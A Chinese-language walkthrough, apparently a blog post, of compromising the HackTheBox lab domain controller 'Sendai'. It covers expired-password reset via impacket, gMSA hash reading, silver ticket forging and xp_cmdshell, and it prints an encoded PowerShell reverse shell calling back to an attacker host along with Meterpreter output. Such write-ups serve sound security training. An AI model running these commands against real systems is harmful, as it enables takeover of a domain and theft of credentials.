题目wp

sendai-wp

初始侦察 

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat rustscan.txt 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/wackymaker/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.234.66:53
Open 10.129.234.66:80
Open 10.129.234.66:88
Open 10.129.234.66:135
Open 10.129.234.66:139
Open 10.129.234.66:389
Open 10.129.234.66:443
Open 10.129.234.66:445
Open 10.129.234.66:464
Open 10.129.234.66:593
Open 10.129.234.66:636
Open 10.129.234.66:3269
Open 10.129.234.66:3268
Open 10.129.234.66:3389
Open 10.129.234.66:5985
Open 10.129.234.66:9389

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat hostname 
10.129.234.66     DC.sendai.vl sendai.vl DC

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat start.sh 
ip=10.129.234.66

80和443虽然开启,但都是iis初始页面,先不着急

存在匿名smb,看信息

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc smb "$ip" -u guest -p '' --shares
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\guest: 
SMB         10.129.234.66   445    DC               [*] Enumerated shares
SMB         10.129.234.66   445    DC               Share           Permissions     Remark
SMB         10.129.234.66   445    DC               -----           -----------     ------
SMB         10.129.234.66   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.66   445    DC               C$                              Default share
SMB         10.129.234.66   445    DC               config                          
SMB         10.129.234.66   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.66   445    DC               NETLOGON                        Logon server share
SMB         10.129.234.66   445    DC               sendai          READ            company share
SMB         10.129.234.66   445    DC               SYSVOL                          Logon server share
SMB         10.129.234.66   445    DC               Users           READ            

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]

users目录没什么东西,但是sendai中我获得了一些用户名

smb: \> cd transfer\
smb: \transfer\> dir
  .                                   D        0  Tue Jul 11 09:00:20 2023
  ..                                  D        0  Tue Jul 18 13:31:04 2023
  anthony.smith                       D        0  Tue Jul 11 08:59:50 2023
  clifford.davey                      D        0  Tue Jul 11 09:00:06 2023
  elliot.yates                        D        0  Tue Jul 11 08:59:26 2023
  lisa.williams                       D        0  Tue Jul 11 08:59:34 2023
  susan.harper                        D        0  Tue Jul 11 08:59:39 2023
  temp                                D        0  Tue Jul 11 09:00:16 2023
  thomas.powell                       D        0  Tue Jul 11 08:59:45 2023

		7019007 blocks of size 4096. 855070 blocks available
smb: \transfer\> cd ../
smb: \> dir
  .                                   D        0  Tue Jul 18 13:31:04 2023
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  hr                                  D        0  Tue Jul 11 08:58:19 2023
  incident.txt                        A     1372  Tue Jul 18 13:34:15 2023
  it                                  D        0  Tue Jul 18 09:16:46 2023
  legal                               D        0  Tue Jul 11 08:58:23 2023
  security                            D        0  Tue Jul 18 09:17:35 2023
  transfer                            D        0  Tue Jul 11 09:00:20 2023

		7019007 blocks of size 4096. 853509 blocks available
smb: \> get incident.txt 
getting file \incident.txt of size 1372 as incident.txt (3.4 KiloBytes/sec) (average 7.0 KiloBytes/sec)
smb: \> dir
  .                                   D        0  Tue Jul 18 13:31:04 2023
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  hr                                  D        0  Tue Jul 11 08:58:19 2023
  incident.txt                        A     1372  Tue Jul 18 13:34:15 2023
  it                                  D        0  Tue Jul 18 09:16:46 2023
  legal                               D        0  Tue Jul 11 08:58:23 2023
  security                            D        0  Tue Jul 18 09:17:35 2023
  transfer                            D        0  Tue Jul 11 09:00:20 2023

		7019007 blocks of size 4096. 852101 blocks available
smb: \>

重置密码

还有一些文本文件,重点则是如下

事件通知(incident.txt)

亲爱的员工们:

希望您一切安好。我们在此通知一项关于用户账户密码的重要安全更新。

近期,我们进行了全面的渗透测试,发现大量用户账户使用了弱且不安全的密码。
为了解决这一问题并维护公司内部最高等级的安全性,IT 部门已采取紧急措施:所有使用不安全密码的用户账户已被强制过期。
这意味着,受影响的用户在下次登录时必须重置密码。

我们诚挚地请求所有受影响的用户尽快完成密码重置流程,以确保系统的安全性和完整性。请记住,强密码在保护敏感信息和抵御潜在威胁方面起着至关重要的作用。

如果您在重置密码过程中需要帮助,或有任何相关问题,请随时联系 IT 支持团队。他们将非常乐意为您提供指导和必要的支持。

感谢您为维护我们共同的安全环境所做的配合与努力。您对安全规范的警惕与遵守为我们的整体安全作出了重要贡献。

我之前经历过获得的用户是初始密码过期的目标用户,但是当时我已经获得了此用户的原始密码,所以我有权限直接通过远程修改密码,但是这次不太一样,我只能初步判断,目标用户的账户和密码应该是一样的,为了验证这一块,我需要rid爆破获取近乎所有用户,之后直接空密码爆破可以

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc ldap $ip -u users -p "" --continue-on-success
LDAP        10.129.234.66   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never)
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Administrator: 
LDAP        10.129.234.66   389    DC               [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090D10, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
LDAP        10.129.234.66   389    DC               [+] sendai.vl\Guest: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\krbtgt: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\DC$: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\sqlsvc: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\websvc: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Dorothy.Jones: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Kerry.Robinson: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Naomi.Gardner: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Anthony.Smith: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Susan.Harper: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Stephen.Simpson: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Marie.Gallagher: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Kathleen.Kelly: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Norman.Baxter: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Jason.Brady: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Malcolm.Smith: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Lisa.Williams: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Ross.Sullivan: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Clifford.Davey: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Declan.Jenkins: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Lawrence.Grant: 
LDAP        10.129.234.66   389    DC               [-] sendai.vl\Leslie.Johnson:

可以看到Elliot.Yates是一个过期用户,我尝试使用nxc直接修改密码,但是失败了,所以我开始枚举这篇文章他引导我到了impacket的一个pull工单,让我意识到changepass.py使用ms-rpc更改是个能绕过的办法

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ impacket-changepasswd sendai.vl/Elliot.Yates:""@$ip -newpass wackMaker1!
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Current password: 
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.

当我查看参数直接键入密码的时候,成功更改完毕,我们的连接也正常

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc smb $ip -u Elliot.Yates -p wackMaker1!
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\Elliot.Yates:wackMaker1!

可惜没有winrm权限,但是我们有足够的凭据抓取猎犬了

因为我懒得贴图片,所以直接口语描述路径了

ELLIOT.YATES@SENDAI.VL属于support组,而这个组对admsvc组有通用all权限,admsvc组对MGTSVC$@SENDAI.VL这个用户有读gmsa的权限

很简单的流程,将自己加入组,直接读gmsa

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ bloodyAD --host $FQDN --dc-ip $ip -d "$domain" -u "$user" -p "$pass" add groupMember ADMSVC "$user"
[+] Elliot.Yates added to ADMSVC

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ bloodyAD --host $FQDN --dc-ip $ip -d "$domain" -u "$user" -p "$pass" get object MGTSVC$ --attr msDS-ManagedPassword

distinguishedName: CN=mgtsvc,CN=Managed Service Accounts,DC=sendai,DC=vl
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:9ed35c68b88f35007aa32c14c1332ce7
msDS-ManagedPassword.B64ENCODED: MnRup9Cfg1yniZGnzaZM2tR8RVDOaG5abV/Z3wdvLW1+fLxXtQfra+OH3WUW0BmC9J1CUi2MKYeyfuiAcS16Q9d2BflORFv8jtQc2yE3Jo5OfPDcbOeYVLn9CWNZ+inVMQrf85QHomxbSAw5U440KhKnsGlZdTZ3CJ6hUoG2eFfPT57bn5C8/xXRx8tcwgHHUuQjChrve9rIzEPDFVD41vguikVetUgArPMvHjoLjg5Z1jrYqhMYUoS22Y3OcJhABJD4HCGNoqxegpm+1a6O5fDBbN6Zhfz62b9itG9QcwLyjrglBsdZZmEAqcFs9/Jfk3ZzeWzUWUWpwwyFUQsxug==

很简单对吧,接下来看看这个用户,猎犬的信息到此中断,但是我们拥有了winrm权限

提权 

*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/18/2023   6:09 AM                Administrator
d-----         9/18/2025   5:21 AM                mgtsvc$
d-r---         7/11/2023  12:36 AM                Public
d-----         8/18/2025   5:05 AM                sqlsvc

在本地发现了数据库用户的桌面信息,可能是下一步,但是外部没开数据库,先留意一下

看看dpapi发现没有什么信息,页面更目录下面找到user.txt

*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         7/11/2023   5:56 AM                config
d-----         4/15/2025   8:20 PM                inetpub
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---         4/15/2025   7:51 PM                Program Files
d-----         7/18/2023   6:11 AM                Program Files (x86)
d-----         7/18/2023  10:31 AM                sendai
d-----         7/11/2023   2:35 AM                SQL2019
d-r---         9/18/2025   5:21 AM                Users
d-----         8/18/2025   5:04 AM                Windows
-a----         4/15/2025   8:27 PM             32 user.txt


*Evil-WinRM* PS C:\> cat user.txt
fff335936142d21a6fa44123b897cd3e

看看smb有无额外信息

└─$ nxc smb $ip -u $user1 -H $hash1 --shares
SMB         10.129.234.66   445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domin:sendai.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.129.234.66   445    DC               [+] sendai.vl\MGTSVC$:9ed35c68b88f35007aa32c14c1332ce7 
SMB         10.129.234.66   445    DC               [*] Enumerated shares
SMB         10.129.234.66   445    DC               Share           Permissions     Remark
SMB         10.129.234.66   445    DC               -----           -----------     ------
SMB         10.129.234.66   445    DC               ADMIN$                          Remote Admin
SMB         10.129.234.66   445    DC               C$                              Default share
SMB         10.129.234.66   445    DC               config          READ,WRITE      
SMB         10.129.234.66   445    DC               IPC$            READ            Remote IPC
SMB         10.129.234.66   445    DC               NETLOGON        READ            Logon server share 
SMB         10.129.234.66   445    DC               sendai          READ,WRITE      company share
SMB         10.129.234.66   445    DC               SYSVOL          READ            Logon server share 
SMB         10.129.234.66   445    DC               Users           READ

多出来了一个config日志可写可读,打开看一看发现是数据库密码

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ smbclient -U $user1 --pw-nt-hash //$ip/config $hash1
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Sep 18 08:43:26 2025
  ..                                DHS        0  Tue Apr 15 22:55:42 2025
  .sqlconfig                          A       78  Tue Jul 11 08:57:11 2023

		7019007 blocks of size 4096. 1187661 blocks available
smb: \> get .sql*
NT_STATUS_OBJECT_NAME_INVALID opening remote file \.sql*
smb: \> get .sqlconfig
getting file \.sqlconfig of size 78 as .sqlconfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ cat .sqlconfig 
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;

没有对外开,所以传stowawy上去做个sock隧道

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> ./windows_x64_agent.exe -c 10.10.16.23:443 -s 123456
windows_x64_agent.exe : 2025/09/18 05:53:41 [*] Starting agent node actively.Connecting to 10.10.16.23:443
    + CategoryInfo          : NotSpecified: (2025/09/18 05:5...10.10.16.23:443:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
┌──(wackymaker㉿kali)-[~/tools/ad-tools/proxy/stowaway]
└─$ ./linux_x64_admin -l 0.0.0.0:443 -s 123456

[*] Starting admin node on port 0.0.0.0:443

    .-')    .-') _                  ('\ .-') /'  ('-.      ('\ .-') /'  ('-.                 
   ( OO ). (  OO) )                  '.( OO ),' ( OO ).-.   '.( OO ),' ( OO ).-.             
   (_)---\_)/     '._  .-'),-----. ,--./  .--.   / . --. /,--./  .--.   / . --. /  ,--.   ,--.
   /    _ | |'--...__)( OO'  .-.  '|      |  |   | \-.  \ |      |  |   | \-.  \    \  '.'  / 
   \  :' '. '--.  .--'/   |  | |  ||  |   |  |,.-'-'  |  ||  |   |  |,.-'-'  |  | .-')     /  
    '..'''.)   |  |   \_) |  |\|  ||  |.'.|  |_)\| |_.'  ||  |.'.|  |_)\| |_.'  |(OO  \   /   
   .-._)   \   |  |     \ |  | |  ||         |   |  .-.  ||         |   |  .-.  | |   /  /\_  
   \       /   |  |      ''  '-'  '|   ,'.   |   |  | |  ||   ,'.   |   |  | |  | '-./  /.__) 
    '-----'    '--'        '-----' '--'   '--'   '--' '--''--'   '--'   '--' '--'   '--'      
			            { v2.2  Author:ph4ntom }
[*] Waiting for new connection...
[*] Connection from node 10.129.234.66:57556 is set up successfully! Node id is 0
(admin) >> use 0
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Error: listen tcp: address tcp/5555: unknown port
(node 0) >> shell
[*] Waiting for response.....
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\Users\mgtsvc$\Documents>whoami
whoami
sendai\mgtsvc$

C:\Users\mgtsvc$\Documents>exit
exit

(node 0) >> help
	help                                            Show help information
	status                                          Show node status,including socks/forward/backward
	listen                                          Start port listening on current node
	addmemo    <string>                             Add memo for current node
	delmemo                                         Delete memo of current node
	ssh        <ip:port>                            Start SSH through current node
	shell                                           Start an interactive shell on current node
	socks      <lport> [username] [pass]            Start a socks5 server
	stopsocks                                       Shut down socks services
	connect    <ip:port>                            Connect to a new node
	sshtunnel  <ip:sshport> <agent port>            Use sshtunnel to add the node into our topology
	upload     <local filename> <remote filename>   Upload file to current node
	download   <remote filename> <local filename>   Download file from current node
	forward    <lport> <ip:port>                    Forward local port to specific remote ip:port
	stopforward                                     Shut down forward services
	backward    <rport> <lport>                     Backward remote port(agent) to local port(admin)
	stopbackward                                    Shut down backward services
	shutdown                                        Terminate current node
	back                                            Back to parent panel
	exit                                            Exit Stowaway
  
(node 0) >> socks 5555
[*] Unknown Command!

	help                                            Show help information
	status                                          Show node status,including socks/forward/backward
	listen                                          Start port listening on current node
	addmemo    <string>                             Add memo for current node
	delmemo                                         Delete memo of current node
	ssh        <ip:port>                            Start SSH through current node
	shell                                           Start an interactive shell on current node
	socks      <lport> [username] [pass]            Start a socks5 server
	stopsocks                                       Shut down socks services
	connect    <ip:port>                            Connect to a new node
	sshtunnel  <ip:sshport> <agent port>            Use sshtunnel to add the node into our topology
	upload     <local filename> <remote filename>   Upload file to current node
	download   <remote filename> <local filename>   Download file from current node
	forward    <lport> <ip:port>                    Forward local port to specific remote ip:port
	stopforward                                     Shut down forward services
	backward    <rport> <lport>                     Backward remote port(agent) to local port(admin)
	stopbackward                                    Shut down backward services
	shutdown                                        Terminate current node
	back                                            Back to parent panel
	exit                                            Exit Stowaway
  
(node 0) >> socks 5555
[*] Trying to listen on 0.0.0.0:5555......
[*] Waiting for agent's response......
[*] Socks start successfully!
(node 0) >>

直接连接

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ proxychains4 impacket-mssqlclient -windows-auth $user2:$pass2@127.0.0.1
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\sqlsvc  guest@master)> select @@servername
                
-------------   
DC\SQLEXPRESS   

SQL (SENDAI\sqlsvc  guest@master)> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name   permission_name     
-----------   -----------------   
server        CONNECT SQL         

server        VIEW ANY DATABASE   

SQL (SENDAI\sqlsvc  guest@master)>

当前权限不足,还是走捷径吧,懒得查数据库了,我们有密码直接打白银票据

获取域sid和服务账户hash
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nxc ldap $ip -u $user2 -p $pass2 --get-sid
LDAP        10.129.234.66   389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl) (signing:None) (channel binding:Never) 
LDAP        10.129.234.66   389    DC               [+] sendai.vl\sqlsvc:SurenessBlob85 
LDAP        10.129.234.66   389    DC               Domain SID S-1-5-21-3085872742-570972823-736764132

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ echo sid=S-1-5-21-3085872742-570972823-736764132>>start.sh 

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ iconv -f ASCII -t UTF-16LE <(printf "$pass2") | openssl dgst -md4
MD4(stdin)= 58655c0b90b2492f84fb46fa78c2d96a

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ echo hash2=58655c0b90b2492f84fb46fa78c2d96a>>start.sh 
制作票据
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ impacket-ticketer -spn MSSQLSvc/$FQDN -user-id 500 Administrator -nthash $hash2 -domain-sid $sid -domain $domain
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
/usr/share/doc/python3-impacket/examples/ticketer.py:141: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for sendai.vl/Administrator
/usr/share/doc/python3-impacket/examples/ticketer.py:600: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
/usr/share/doc/python3-impacket/examples/ticketer.py:718: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/share/doc/python3-impacket/examples/ticketer.py:719: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
/usr/share/doc/python3-impacket/examples/ticketer.py:843: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache

搞定,利用admin权限访问数据库

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ export KRB5CCNAME=Administrator.ccach

┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ proxychains4 impacket-mssqlclient DC.sendai.vl -k -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SENDAI\Administrator  dbo@master)>

还是没有xpcmd权限,但是只是没有开启,直接开启即可

SQL (SENDAI\Administrator  dbo@master)> EXEC sp_configure 'show advanced options',1;
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)> RECONFIGURE;
SQL (SENDAI\Administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell',1;
INFO(DC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SENDAI\Administrator  dbo@master)> RECONFIGURE;
SQL (SENDAI\Administrator  dbo@master)> EXEC xp_cmdshell 'whoami'
output          
-------------   
sendai\sqlsvc   

NULL

利用powershell反弹shell回来

SQL (SENDAI\Administrator  dbo@master)> EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAzACIALAA4ADAAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA'
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/sendai]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.16.23] from (UNKNOWN) [10.129.234.66] 57968
whoami
sendai\sqlsvc
PS C:\Windows\system32>

shell加强,上线msf,顺便利用msf进程迁移稳定一些

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://10.10.16.23:4444
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Staging x64 payload (204892 bytes) ...
[!] https://10.10.16.23:4444 handling request from 10.129.234.66; (UUID: ronoammx) Without a database connected that payload UUID tracking will not work!
[*] Session ID 1 (10.10.16.23:4444 -> 10.129.234.66:58076) processing AutoRunScript 'post/windows/manage/migrate'
[*] Running module against DC
[*] Current server process: shell.exe (3968)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 5208
[+] Successfully migrated into process 5208
[*] Meterpreter session 1 opened (10.10.16.23:4444 -> 10.129.234.66:58076) at 2025-09-18 09:26:51 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 768 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.4052]
(c) Microsoft Corporation. All rights reserved.

C:\users\sqlsvc\Documents>whoami /all
whoami /all

USER INFORMATION
----------------

User Name     SID                                         
============= ============================================
sendai\sqlsvc S-1-5-21-3085872742-570972823-736764132-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                                             Attributes                                        
========================================== ================ =============================================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                                    Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS                Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner    
LOCAL                                      Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                                        Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
